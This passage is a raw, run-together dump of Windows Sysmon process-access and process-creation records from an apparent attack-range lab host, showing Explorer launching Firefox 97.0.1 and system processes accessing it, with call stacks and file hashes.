Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e8d|C:\Windows\System32\SHELL32.dll+61f80|C:\Windows\System32\SHELL32.dll+11d74|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.922{C8EA50B7-F2AD-6215-C000-000000003802}48565944C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+11d74|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.922{C8EA50B7-F2AD-6215-C000-000000003802}48565944C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e8d|C:\Windows\System32\SHELL32.dll+61f80|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.922{C8EA50B7-F2AD-6215-C000-000000003802}48565944C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.922{C8EA50B7-F2AD-6215-C000-000000003802}48565944C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.922{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.922{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.922{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e8d|C:\Windows\System32\SHELL32.dll+61f80|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.922{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.922{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.860{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.860{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.860{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.844{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AA-6216-1505-000000003802}5360C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+b574|C:\Program Files\Mozilla Firefox\firefox.exe+98d3|C:\Program Files\Mozilla Firefox\firefox.exe+1ca08|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.782{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.782{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.782{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.782{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.782{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.782{C8EA50B7-11AA-6216-1505-000000003802}53604696C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Program Files\Mozilla Firefox\firefox.exe+cd91|C:\Program Files\Mozilla Firefox\firefox.exe+98d3|C:\Program Files\Mozilla Firefox\firefox.exe+1ca08|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.790{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe97.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32MediumMD5=47024075D8FB7B85F0B6615FFB0E87A5,SHA256=FE842C526ABBEE926C9CFE27F45AE3BC20F5614878120A9150B1A2DDA1CD226D,IMPHASH=FAFFE564A2DAFFCCC4A6BE71D34C1748{C8EA50B7-11AA-6216-1505-000000003802}5360C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x8000000000000000287848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.782{C8EA50B7-11AA-6216-1505-000000003802}53604696C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+b574|C:\Program Files\Mozilla Firefox\firefox.exe+98d3|C:\Program Files\Mozilla Firefox\firefox.exe+1ca08|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.750{C8EA50B7-F11F-6215-1400-000000003802}10481152C:\Windows\System32\svchost.exe{C8EA50B7-11AA-6216-1505-000000003802}5360C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.750{C8EA50B7-F11F-6215-1400-000000003802}10481152C:\Windows\System32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.750{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.750{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.750{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-11AA-6216-1505-000000003802}5360C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.750{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.750{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.750{C8EA50B7-F2AD-6215-C000-000000003802}48565788C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1505-000000003802}5360C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a90ff|C:\Windows\System32\windows.storage.dll+a8d75|C:\Windows\System32\windows.storage.dll+a8866|C:\Windows\System32\windows.storage.dll+a9cd8|C:\Windows\System32\windows.storage.dll+a868e|C:\Windows\System32\windows.storage.dll+ab4a5|C:\Windows\System32\windows.storage.dll+ab824|C:\Windows\System32\windows.storage.dll+aae60|C:\Windows\System32\windows.storage.dll+ad68a|C:\Windows\System32\windows.storage.dll+ad442|C:\Windows\System32\SHELL32.dll+3fa6d|C:\Windows\System32\SHELL32.dll+3e606|C:\Windows\System32\SHELL32.dll+80381|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\System32\windows.storage.dll+10932|C:\Windows\System32\windows.storage.dll+10629|C:\Windows\System32\windows.storage.dll+104ff|C:\Windows\System32\SHELL32.dll+80407|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\System32\SHLWAPI.dll+e1f7 154100x8000000000000000287839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.747{C8EA50B7-11AA-6216-1505-000000003802}5360C:\Program Files\Mozilla Firefox\firefox.exe97.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" C:\Program Files\Mozilla 